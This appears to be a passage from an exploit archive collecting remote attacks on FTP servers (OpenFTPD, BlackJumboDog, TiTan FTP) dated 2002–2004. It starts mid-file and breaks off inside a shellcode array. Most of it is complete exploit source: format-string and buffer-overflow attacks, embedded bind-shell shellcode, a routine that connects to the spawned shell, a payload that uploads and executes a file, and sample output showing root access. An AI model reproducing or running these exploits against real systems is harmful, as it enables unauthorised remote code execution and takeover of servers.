(void) gettimeofday(&tv_start, NULL);
do {
(void) gettimeofday(&tv_cur, NULL);
if (sec > 0) {
if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
((tv_start.tv_sec * 1000000) +
(tv_start.tv_usec))) > (sec * 1000000))
{
return (-1);
}
}
n = net_rtimeout(fd, NET_READTIMEOUT);
if (n <= 0) {
return (-1);
}
n = read(fd, buf, 1);
if (n <= 0) {
return (n);
}
rb++;
if (*buf == '\n')
return (rb);
buf++;
if (rb >= bufsize)
return (-2); /* buffer full */
} while (1);
}
int
net_rtimeout (int fd, int sec)
{
fd_set rset;
struct timeval tv;
int n, error, flags;
error = 0;
flags = fcntl(fd, F_GETFL, 0);
n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1)
return (-1);
FD_ZERO(&rset);
FD_SET(fd, &rset);
tv.tv_sec = sec;
tv.tv_usec = 0;
/* now we wait until more data is received then the tcp low level
* watermark, which should be setted to 1 in this case (1 is default)
*/
n = select(fd + 1, &rset, NULL, NULL, &tv);
if (n == 0) {
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1) {
return (-1);
}
/* socket readable ? */
if (FD_ISSET(fd, &rset)) {
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (1);
} else {
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
errno = ETIMEDOUT;
return (-1);
}
}
static int
sc_build_x86_lnx (unsigned char *target, size_t target_len,
unsigned char *shellcode, char **argv)
{
int i;
size_t tl_orig = target_len;
if (strlen (shellcode) >= (target_len - 1))
return (-1);
memcpy (target, shellcode, strlen (shellcode));
target += strlen (shellcode);
target_len -= strlen (shellcode);
for (i = 0 ; argv[i] != NULL ; ++i)
;
/* set argument count
*/
target[0] = (unsigned char) i;
target++;
target_len--;
for ( ; i > 0 ; ) {
i -= 1;
if (strlen (argv[i]) >= target_len)
return (-1);
printf ("[%3d/%3d] adding (%2d): %s\n",
(tl_orig - target_len), tl_orig,
strlen (argv[i]), argv[i]);
memcpy (target, argv[i], strlen (argv[i]));
target += strlen (argv[i]);
target_len -= strlen (argv[i]);
target[0] = (unsigned char) (i + 1);
target++;
target_len -= 1;
}
return (tl_orig - target_len);
}
// [2002-05-14]
21 OpenFTPD (<= 0.30.2) Remote Exploit
/************************************************** *********
* hoagie_openftpd.c
* LINUX/X86 OPENFTPD REMOTE EXLPOIT (<= 0.30.2)
*
* "
* Searching for those warez ftpd's out there and
* leeching 'free' movies
* "
*
* Remote Linux/OpenFTPD exploit for the format string bug
* in the message system. This vulnerability was rediscovered
* by a VOID.AT.
*
* HOWTO get the offsets
* andi@denkmal:~$ gdb ~/openftpd/bin/msg
* ...
*
* (gdb) x/i fgets
* 0x8048ae4 <fgets>: jmp *0x804db90
* ^^^^^^^^^
* the first one
* (gdb) break main
* Breakpoint 1 at 0x804bd05
* (gdb) r
* Starting program: /home/andi/openftpd/bin/msg
* [Thread debugging using libthread_db enabled]
* [New Thread 16384 (LWP 29479)]
* [Switching to Thread 16384 (LWP 29479)]
*
* Breakpoint 1, 0x0804bd05 in main ()
* (gdb) x/i system
* 0x40071c40 <system>: push %ebp
* ^^^^^^^^^^
* the second addresss
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* [email protected]
* http://www.void.at
*
************************************************** **********/
#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
enum EXPLOITSTATE { SENDUSER, SENDPASS, DELMESSAGE, PURGEMESSAGE, SENDMESSAGE, READMESSAGE, READING };
struct target_t {
char *sys;
char *libc;
int fgetsgot;
int system;
};
struct target_t targets[] = {
{ "Debian unstable", "2.3.2", 0x804db90, 0x40072c40 },
{ NULL, 0, 0 }
};
int connectserver(int *s, char *host, int port) {
struct sockaddr_in s_in;
struct hostent *he;
char *ip;
if ( (*s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
fprintf(stderr," can't create TCP socket\n");
return -1;
}
memset(&s_in, 0, sizeof(s_in));
s_in.sin_family = AF_INET;
s_in.sin_port = htons(port);
if ( (he = gethostbyname(host)) != NULL)
memcpy(&s_in.sin_addr, he->h_addr, he->h_length);
else {
if ( (s_in.sin_addr.s_addr = inet_addr(host) ) < 0) {
return -3;
}
}
if (connect(*s, (struct sockaddr *)&s_in, sizeof(s_in)) == -1) {
fprintf(stderr," can't connect to %s:%d\n", host, port);
return -4;
}
return 0;
}
int sendlogin(int s, char *username) {
char tmp[2048] = "";
snprintf(tmp, sizeof(tmp), "USER %s\n", username);
return write(s, tmp, strlen(tmp));
}
int sendpassword(int s, char *password) {
char tmp[2048] = "";
snprintf(tmp, sizeof(tmp), "PASS %s\n", password);
return write(s, tmp, strlen(tmp));
}
int purgemessage(int s) {
char tmp[2048] = "";
snprintf(tmp, sizeof(tmp), "SITE MSG PURGE\n");
return write(s, tmp, strlen(tmp));
}
int delmessage(int s) {
char tmp[2048] = "";
snprintf(tmp, sizeof(tmp), "SITE MSG DEL ALL\n");
return write(s, tmp, strlen(tmp));
}
int sendexploit(int s, char *username, int idx, char *exec) {
int i;
char tmp[4096], execcode[68], writecode[68];
unsigned short high, low, count1, count2;
int addr1, addr2;
high = targets[idx].system >> 16 & 0xFFFF;
low = targets[idx].system & 0xFFFF;
if (high > low) {
count1 = low;
count2 = high;
addr1 = targets[idx].fgetsgot;
addr2 = targets[idx].fgetsgot + 2;
} else {
count1 = high;
count2 = low;
addr1 = targets[idx].fgetsgot + 2;
addr2 = targets[idx].fgetsgot;
}
if (exec) {
strcpy(execcode, exec);
}
if (strlen(execcode) < 32) {
do {
strcat(execcode, "_");
} while (strlen(execcode) < 32);
}
/* calc count1:
*
* 1.) string will be stored in str => sprintf(str, " !C| !0%-66s !C|!0\n", buff);
* so we have to subtract 8 bytes from count1 (=> strlen("" !C| !0"))
* 2.) the next data will be our string for system call
* so we have to subtract strlen(execcode) from count1
* 3.) at least we have to subtract 8 bytes for the two addresses that are
* used for writing (%hn)
*/
count1 -= (strlen(execcode) + 16);
snprintf(writecode, sizeof(writecode),
"%c%c%c%c%c%c%c%c%%%du%%18$hn%%%du%%19$hn",
addr1 & 0xFF, (addr1 >> 8) & 0xFF, (addr1 >> 16) & 0xFF, (addr1 >> 24) & 0xFF,
addr2 & 0xFF, (addr2 >> 8) & 0xFF, (addr2 >> 16) & 0xFF, (addr2 >> 24) & 0xFF,
count1, count2 - count1 - 0x30);
snprintf(tmp, sizeof(tmp), "SITE MSG SEND %s %s%s\n", username, execcode, writecode);
printf(" len: %d, sending code [%s]\n", strlen(execcode) + strlen(writecode), tmp);
return write(s, tmp, strlen(tmp));
}
int readmessage(int s) {
char tmp[2048] = "";
snprintf(tmp, sizeof(tmp), "SITE MSG READ\n");
return write(s, tmp, strlen(tmp));
}
int attack(int s, char *user, char *password, int idx, char *exec) {
fd_set fs;
int selret, state, len, code;
char buffer[2048] = "";
FD_ZERO(&fs);
FD_SET(s, &fs);
state = SENDUSER;
do {
selret = select(s + 1, &fs, NULL, NULL, NULL);
if (selret > 0 && FD_ISSET(s, &fs)) {
memset(buffer, 0, sizeof(buffer));
len = read(s, buffer, sizeof(buffer));
printf("<<< %s\n", buffer);
sscanf(buffer, "%d", &code);
switch(state) {
case SENDUSER: sendlogin(s, user);
state = SENDPASS;
break;
case SENDPASS: sendpassword(s, password);
state = DELMESSAGE;
break;
case DELMESSAGE: delmessage(s);
state = PURGEMESSAGE;
break;
case PURGEMESSAGE: purgemessage(s);
state = SENDMESSAGE;
break;
case SENDMESSAGE: if (code > 500) {
fprintf(stderr, " login failed\n");
len = -1;
} else if (code == 230) {
fprintf(stderr, " sending exploit code ...\n");
sendexploit(s, user, idx, exec);
state = READMESSAGE;
}
break;
case READMESSAGE: sleep(5);
readmessage(s);
state = READING;
break;
case READING: if (code == 200 && strstr(buffer, "00000") && strstr(buffer, exec)) {
printf(" done\n");
}
break;
}
}
} while (len > 0);
}
void helpme(int argc, char **argv) {
int i;
printf("hoagie_openftpd - openftpd < 0.30.2 x86/linux remote\n");
printf("-andi / void.at\n\n");
printf("usage: %s -h hostname:port -u username -p password -t target -e command\n", argv[0]);
printf("\n\nexample:\n");
printf("%s -u localhost:21 -u anonymous -t 0 -e \"id > /tmp/0wned\"\n");
printf("\ntargets:\n");
for (i = 0; targets[i].sys != NULL; i++) {
printf("%d %s (libc: %s): 0x%0x 0x%0x\n", i, targets[i].sys, targets[i].libc, targets[i].fgetsgot, targets[i].system);
}
}
int main(int argc, char **argv) {
char optchar, *exec = NULL, server[512] = "", *username = NULL, *password = NULL;
int s, retval = -1, port, target = 0;
if (argc < 2) {
helpme(argc, argv);
} else {
while ( (optchar = getopt(argc, argv, "h:t:u:p:e:")) != EOF ) {
switch(optchar) {
case 'h': sscanf(optarg, "%[^:]:%d", server, &port);
break;
case 'u': username = optarg;
break;
case 'p': password = optarg;
break;
case 't': target = atoi(optarg);
break;
case 'e': exec = optarg;
break;
}
}
if (!strcmp(server, "")) {
strcpy(server, "127.0.0.1");
port = 21;
}
if (!username) {
username = "anonymous";
}
if (!password) {
password = "[email protected]";
}
if (!exec) {
exec = "id; killall msg; ";
}
fprintf(stderr, " connecting %s:%d (%s/%s)...\n", server, port, username, password);
if (!connectserver(&s, server, port)) {
retval = attack(s, username, password, target, exec);
close(s);
}
}
return retval;
}
// [2004-08-03]
21 OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit
/*
* shouts to mitakeet :D
*
* exploit for openftpd format string bug. tested on most current version only.
* -infamous42md AT hotpop DOT com is real email
*
* only tricky part is find a place to stick the shell, as there isn't enough
* room to send it with the format string. thankfully when using the 'site msg'
* commands, all of the args to command are passed directly through to the msg
* program. so when we tell ftpd to read messages with 'site msg read X', we
* pass the shellcode as X. the jumpslot for fclose() gets hijacked, and the
* retaddr lies early in stack, it's argv[3].
* no values are hardcoded into sploit, all come from command line, this works
* for me on slack 9:
*
* [n00b localho outernet] ./openf -u root -p "" -l 0x0804d8b8 -r 0xbffff9d4 -h
* localho -o 6969 -a 2 -b 18
* connected to localho
* Logged in as root
* Exploit sent
* connected to localho
* got a shell
*
* id
* uid=0(root) gid=0(root)
* groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel),11(floppy)
*
* - Connection closed by user
*
* Usage: ./openf
* [ -u user ] [ -p pass ] [ -l retloc ] [ -r retaddr ]
* [ -b parms base ] [ -h host ] [ -o port ] [ -a align ]
*
* */
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#define SLOP 8
#define NOP 0x90
#define BS 0x1000
#define SBS 512
#define SHELL_PORT 7000
#define die(x) do{ perror(x); exit(1); }while(0)
typedef struct __args {
char *user, *pass;
char *host;
u_short port;
u_long retloc, retaddr;
int parms_base; /* distance to the dummy param */
int align;
} args;
/* call them shell code */
char sc[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x 04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\x b0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\x cd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x 01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x 50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\x c9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x 73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x 80";
char *usage =
"\t[ -u user ] [ -p pass ] [ -l retloc ] [ -r retaddr ]\n"
"\t[ -b parms base ] [ -h host ] [ -o port ] [ -a align ]\n";
void parse_args(int argc, char **argv, args * argp)
{
int c;
while ((c = getopt(argc, argv, "a:u:p:l:r:b:h:o:")) != -1) {
switch (c) {
case 'a':
if ((argp->align = atoi(optarg)) < 0 || argp->align > 3)
goto pusage;
break;
case 'u':
argp->user = optarg;
break;
case 'p':
argp->pass = optarg;
break;
case 'l':
sscanf(optarg, "%lx", &argp->retloc);
break;
case 'r':
sscanf(optarg, "%lx", &argp->retaddr);
break;
case 'h':
argp->host = optarg;
break;
case 'o':
argp->port = atoi(optarg);
break;
case 'b':
if ((argp->parms_base = atoi(optarg)) > 0)
break;
/*
* fall thru
*/
pusage:
case ':':
case '?':
default:
fprintf(stderr, "Usage: %s\n%s", argv[0], usage);
exit(1);
}
}
if (optind != argc || !argp->user || !argp->pass || !argp->retloc ||
!argp->retaddr || !argp->host || !argp->port || !argp->parms_base)
goto pusage;
}
int conn(char *host, u_short port)
{
int sock = 0;
struct hostent *hp;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
hp = gethostbyname(host);
if (hp == NULL) {
herror("ghbn");
die("bla");
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
die("socket");
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
die("connect");
printf("connected to %s\n", host);
return sock;
}
void login(char *user, char *pass, int sock)
{
char ubuf[BS], pbuf[BS];
snprintf(ubuf, BS - 1, "USER %s\r\n", user);
ubuf[BS - 1] = 0;
snprintf(pbuf, BS - 1, "PASS %s\r\n", pass);
pbuf[BS - 1] = 0;
sleep(1);
if (send(sock, ubuf, strlen(ubuf), 0) < 0)
die("send");
sleep(1);
if (send(sock, pbuf, strlen(pbuf), 0) < 0)
die("send");
sleep(1);
printf("Logged in as %s\n", user);
}
void get_fmt(args * argp, char *fb)
{
u_short high, low;
ulong retloc = argp->retloc, slop = 0;
int dummy = argp->parms_base, len = 0;
/* bytes printed before us */
slop = SLOP + argp->align;
/* ret addr */
low = (argp->retaddr & 0xffff);
high = argp->retaddr >> 16;
/* adjust ret addr words */
if (low > high)
high += (0x10000 - low);
else if (high > low)
high -= low;
else if (high == low) {
fprintf(stderr, "Can't encode a NULL high retaddr, bailing\n"
"high = %hx\tlow = %hx\n", high, low);
die("adsf");
}
low -= slop;
/* align */
memset(fb, 'A', argp->align);
fb[argp->align] = 0;
/* write code
* fmt look like:
* ALIGN-write_code-dummy-addr1-addr2-low_retaddr-high_retaddr
*/
sprintf(fb,
/* retL writeL retH writeH */
"%s" "%%%d$*%d$u" "%%%d$hn" "%%%d$*%d$u" "%%%d$hn",
fb, dummy, dummy + 3, dummy + 1, dummy, dummy + 4, dummy + 2);
/* args */
strcat(fb, "1111"); /* dummy */
len = strlen(fb);
*(u_int *) (fb + len) = retloc; /* write 1 */
len += sizeof(retloc);
*(u_int *) (fb + len) = retloc + 2; /* write 2 */
len += sizeof(retloc);
*(u_short *) (fb + len) = low; /* ret low */
*(u_short *) (fb + len + 2) = 0x0101; /* can't be 0 */
len += sizeof(retloc);
*(u_short *) (fb + len) = high; /* ret high */
*(u_short *) (fb + len + 2) = 0x0101; /* can't be 0 */
len += sizeof(retloc);
fb[len] = 0;
}
void sploit(args * argp, int sock)
{
char buf[BS], fmt[BS], sb[BS];
/* setup shell buf */
memset(sb, NOP, BS);
strncpy(sb + 100, sc, BS - 101);
sb[BS - 1] = 0;
get_fmt(argp, fmt);
/* slip them the poison */
snprintf(buf, BS - 1, "site msg send %s %s\r\n", argp->user, fmt);
buf[BS - 1] = 0;
if (send(sock, buf, strlen(buf), 0) < 0)
die("send");
sleep(5);
/* and make them eat it */
snprintf(buf, BS - 1, "site msg read %s\r\n", sb);
buf[BS - 1] = 0;
if (send(sock, buf, strlen(buf), 0) < 0)
die("send");
printf("Exploit sent\n");
sleep(1);
}
void shell(char *host, u_short port)
{
int sock = 0, l = 0;
char buf[BS];
fd_set rfds;
sock = conn(host, port);
printf("got a shell\n\n");
FD_ZERO(&rfds);
while (1) {
FD_SET(STDIN_FILENO, &rfds);
FD_SET(sock, &rfds);
if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
die("select");
if (FD_ISSET(STDIN_FILENO, &rfds)) {
if ((l = read(0, buf, BS)) <= 0)
die("\n - Connection closed by user\n");
if (write(sock, buf, l) < 1)
die("write");
}
if (FD_ISSET(sock, &rfds)) {
l = read(sock, buf, sizeof(buf));
if (l == 0)
die("\n - Connection terminated.\n");
else if (l < 0)
die("\n - Read failure\n");
if (write(1, buf, l) < 1)
die("write");
}
}
}
int main(int argc, char **argv)
{
int sock = 0;
args args;
memset(&args, 0, sizeof(args));
parse_args(argc, argv, &args);
sock = conn(args.host, args.port);
login(args.user, args.pass, sock);
sploit(&args, sock);
close(sock);
sleep(20);
shell(args.host, SHELL_PORT);
return 0;
}
// [2004-08-04]
21 BlackJumboDog Remote Buffer Overflow Exploit
#!/usr/bin/perl
#
# blackJumboDog Exploit code by Tal zeltzer
#
use strict;
use IO::Socket::INET;
usage() unless(@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
my $shellcode =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x4f\x85".
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x 85\x7c\xcd\x19".
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x 84\xc5\x13\x05".
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x 84\xc1\xa9\xb0".
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x 42\xc4\x6a\x74".
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x 89\x64\x13\x15".
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\x da\x71\xc5\x14".
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x 89\xa4\xc3\x53".
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x 53\xa6\x5f\xce".
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x 85\x2f\x98\xdf".
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\x cc\xa9\xd1\xeb".
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x 68\xd3\xa3\x18".
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x 52\xa6\x47\xc6".
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x 7a\x7a\x9c\x16".
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\x b5\x1e\x58\x1f".
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\x b4\xf4\xcb\x1c".
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\x d0\x0b\xcb\x18".
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\x c6\x62\xdc\x4f".
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\x dc\xdc\x33\xc8".
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\x a1\x13\x99\x4e".
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x 08\x6b\xbc\x5f".
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x 7a\x5a\x98\x27".
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\x f0\x2f\xf0\xe2".
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x 7a\xfc\x67\x3a".
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x 7a\xff\x98";
my $socket = IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
print "[+] Connected to host\r\n";
$socket->autoflush(1);
#receive banner
my $repcode = "220 ";
my $response = recv_reply($socket,$repcode);
#send USER command
my $username = "anonymous";
print $socket "USER $username\r\n";
$repcode = "";
select(undef, undef, undef, 1.002); # sleep of 1.2 sec
#Send PASS Command ( Evil Buffer )
# EIP At 308
# 7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 )
printf "[+] Sending shellcode\r\n";
my $buf = "A"x308;
$buf = $buf . "\xEB\x06\xEB\x06"; # Jump 6 bytes forward
$buf = $buf . "\x60\x2F\x4E\x7C";
$buf = $buf . $shellcode;
print $socket "PASS $buf\r\n";
select(undef, undef, undef, 1.002); # sleep of 1.2 sec
$repcode = "";
recv_reply($socket, $repcode);
close($socket);
system("telnet $host 4444");
exit(0);
sub usage
{
# print usage information
print "\nUsage: jumbo.pl <host> <port>\n
<host> - The host to connect to
<port> - The TCP port\n\n";
exit(1);
}
sub recv_reply
{
# retrieve any reply
my $socket = shift;
my $repcode = shift;
$socket or die "Can't receive on socket\n";
my $res="";
while(<$socket>)
{
$res .= $_;
if (/$repcode/) { last; }
}
return $res;
}
// [2004-08-05]
21 TiTan FTP Server Long Command Heap Overflow PoC Exploit
/*
*-----------------------------------------------------------------------
*
* titanftp.c - TiTan FTP Server Long Command Heap Overflow PoC Exploit
*
* Copyright (C) 2000-2004 HUC All Rights Reserved.
*
* Author : lion
* : lion cnhonker net
* : www cnhonker com
* Date : 2004-08-30
*
*-----------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define FTPPORT 21
#define BUFFSIZE 204800
#define OVERFLOWSIZE 20480
#define SIZE 2048
// function
int create_socket();
int client_connect(int sockfd,char* server,int port);
int writebuf(char *s,int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
void checkstatus(char *s);
void loginftp(SOCKET sockfd, char *user, char *pass);
int show = 1;
char recvbuf[BUFFSIZE];
char sendbuf[BUFFSIZE];
void main(int argc, char *argv[])
{
WSADATA wsa;
unsigned short port;
unsigned long ip;
char user[32] = "anonymous";
char pass[32] = "anonymous";
char *command = "CWD ";
SOCKET s;
int size = OVERFLOWSIZE;
printf("TiTan FTP Server Long Command Heap Overflow PoC Exploit\r\n");
printf("lion lion#cnhonker.net, http://www.cnhonker.com\r\n\n");
if(argc < 3)
{
printf("%s <TargetHost> <TargetPort>\r\n", argv[0]);
return;
}
WSAStartup(MAKEWORD(2,2),&wsa);
while(1)
{
if((s=create_socket())==0)
{
printf("[-] ERROR: Create socket failed.\r\n");
return;
}
if(!client_connect(s, argv[1], atoi(argv[2])))
exit(-1);
loginftp(s, user, pass);
memset(sendbuf, 0 ,BUFFSIZE);
memcpy(sendbuf, "pasv\r\n", 6);
writebuf("Send pasv", s, sendbuf, 6);
readbuf("read", s, recvbuf, BUFFSIZE);
memset(sendbuf, 0, BUFFSIZE);
memset(sendbuf, 'A', size);
memcpy(sendbuf, command, strlen(command));
sendbuf[size-2] ='\r';
sendbuf[size-1] ='\n';
printf("buff size :%d\r\n%s\r\n", strlen(sendbuf), sendbuf);
show=1;
writebuf("Send overflow buff", s, sendbuf, size);
readbuf("read", s, recvbuf, BUFFSIZE);
//send QUIT
memset(sendbuf,0, BUFFSIZE);
sprintf(sendbuf, "%s\r\n", "QUIT");
writebuf("Send QUIT", s, sendbuf, strlen(sendbuf));
//show=1;
//readbuf("[+] QUIT......", s, recvbuf, BUFFSIZE);
//return;
if(s)
closesocket(s);
Sleep(2000);
}
WSACleanup();
}
int create_socket()
{
int sockfd;
sockfd=socket(AF_INET,SOCK_STREAM,0);
if(sockfd<0)
{
printf("[-] Create socket error.\r\n");
return(0);
}
return(sockfd);
}
int client_connect(int sockfd,char* server,int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;
if((host=gethostbyname(server))==NULL)
{
printf("[-] ERROR: gethostbyname(%s) error\n", server);
return(-1);
}
memset(&cliaddr, 0, sizeof(struct sockaddr));
cliaddr.sin_family=AF_INET;
cliaddr.sin_port=htons(port);
cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
printf("[+] Trying %s:%d......", server, port);
fflush(stdout);
if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
{
printf("FAILED!\r\n");
closesocket(sockfd);
return(-1);
}
printf("OK!\r\n");
return(1);
}
int writebuf(char *s,int socket,char *buffer,int len)
{
int j;
if(s)
{
printf("[+] %s......", s);
fflush(stdout);
}
j=send(socket,buffer,len,0);
if(j<=0)
{
printf("FAILED!\r\n");
exit(-1);
}
printf("OK!\r\n");
return j;
}
int readbuf(char *s,int socket,char *buffer,int len)
{
int a,b,i,j=0;
a=b=i=0;
memset(buffer,0,len);
if(s)
{
printf("[+] %s......", s);
fflush(stdout);
}
j=recv(socket,buffer,len-1,0);
if(j <= 0)
{
if(s) printf("FAILED!\n");
printf("[-] Recv data error.\n");
exit(-1);
}
if(s) printf("OK!\n");
buffer[len-1]='\0';
if(show==1) printf("<==\r\n%s<==\r\n",buffer);
return j;
}
void checkstatus(char *s)
{
if(s==NULL) exit(-1);
if(isdigit(*s))
{
if(s[0]=='5')
{
printf("[-] Server told:%s\n",s);
exit(-1);
}
else return;
}
printf("[-] Server said:%s\n",s);
exit(-1);
}
void loginftp(SOCKET sockfd, char *user, char *pass)
{
int j;
show=1;
readbuf("Get FTP Server banner",sockfd, recvbuf, SIZE);
//show=0;
//send USER username
memset(sendbuf,0,BUFFSIZE);
j=sprintf(sendbuf,"%s %s\r\n", "USER", user);
writebuf("Send USER", sockfd,sendbuf,j);
readbuf(NULL,sockfd, recvbuf, BUFFSIZE);
checkstatus(recvbuf);
//send PASS password
memset(sendbuf,0,BUFFSIZE);
j=sprintf(sendbuf,"%s %s\r\n","PASS", pass);
writebuf("Send PASS", sockfd, sendbuf, j);
readbuf(NULL,sockfd,recvbuf, BUFFSIZE);
checkstatus(recvbuf);
printf("[+] User %s logged in.\r\n", user);
}
// [2004-08-31]
21 BlackJumboDog FTP Server 3.6.1 Remote Buffer Overflow Exploit
/*
6.9.04|www.Delikon.de|Delikon
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
http://www.securiteam.com/windowsntfocus/5AP040ADPW.html
Thx to Chew Keong TAN
C:\Codes\blackjumbodog\Release>bjdexploit 192.168.0.3 21 klein.exe
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
http://www.securiteam.com/windowsntfocus/5AP040ADPW.html
Thx to Chew Keong TAN
Delikon|6.9.04|www.Delikon.de
[+] Connected.
220 FTP ( BlackJumboDog Version 3.6.1 ) ready
[+]Shellcode length: 461
[+] Sending the shellcode
[+] Sleeping
[+] Opening File
[+] File found ready to send
[+] Connected
[+] Sending executable.
....
[+] All done, server have now executed your executable!
[+] Have a nice day
*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
//opens a port on 7777
//where you can upload a exe
//after terminating the network connection to port 7777
//the exe gets executed
//you will find the asm sourcecode at www.delikon.de
//it also exits with ExitThread, so the shellcode don't crashes the service
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x4A\xFE\x80\x30\x88\x 40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\x61\xE0\x89\x88\x88\xD3\xDD\x01\x6D\xEE\x 09\x64\xBC\x88\x01\x6E\xEE\x09"
"\x64\x84\x88\x60\x57\x88\x88\x88\x01\x4F\xDF\xE0\x 06\xC6\x86\x64\x60\x63\x88\x88"
"\x88\x01\xCD\x80\x05\xDB\xB8\xDA\x77\xDD\x80\x01\x CD\x80\x05\xDB\xB3\x01\xDE\xBC"
"\xE2\x85\xD1\xEE\x09\x71\x8F\x88\xFD\x8B\x03\xF5\x 80\x01\x86\xDF\x77\xFC\x03\x74"
"\x60\x37\x88\x88\x88\x03\x86\x01\xCC\x06\x74\x6A\x 6A\xEE\x09\x64\x18\x89\xDC\xE0"
"\x89\x89\x88\x88\x77\xDE\x8C\xB9\x77\xDF\xDF\xDF\x DF\xCF\xDF\xCF\xDF\x77\x9E\x01"
"\x4B\xB9\x77\xDF\xDF\xE0\x8A\x88\x96\xE9\x01\x6A\x E2\x98\xDA\xDB\x77\xDE\x80\xDF"
"\xDB\x77\xDE\x84\xDF\xDE\xDB\x77\xDE\x98\x01\x4B\x E2\x88\xE2\x8E\xE2\x8C\xE2\x88"
"\xE2\x8F\xE0\x88\x88\x88\x68\x77\xFE\xBC\x77\xDE\x AC\x01\x4F\x09\x64\x14\x77\x77"
"\x77\x01\x6D\x05\xDD\xEC\xE2\x88\xE0\xEC\x88\x88\x 88\xDA\xDB\x77\xDE\x9C\xB5\x77"
"\x77\x77\x77\xFC\x9D\xB5\x88\x88\x88\x88\xFC\x86\x 05\xDD\xEC\xE2\x88\xD9\xD8\xDA"
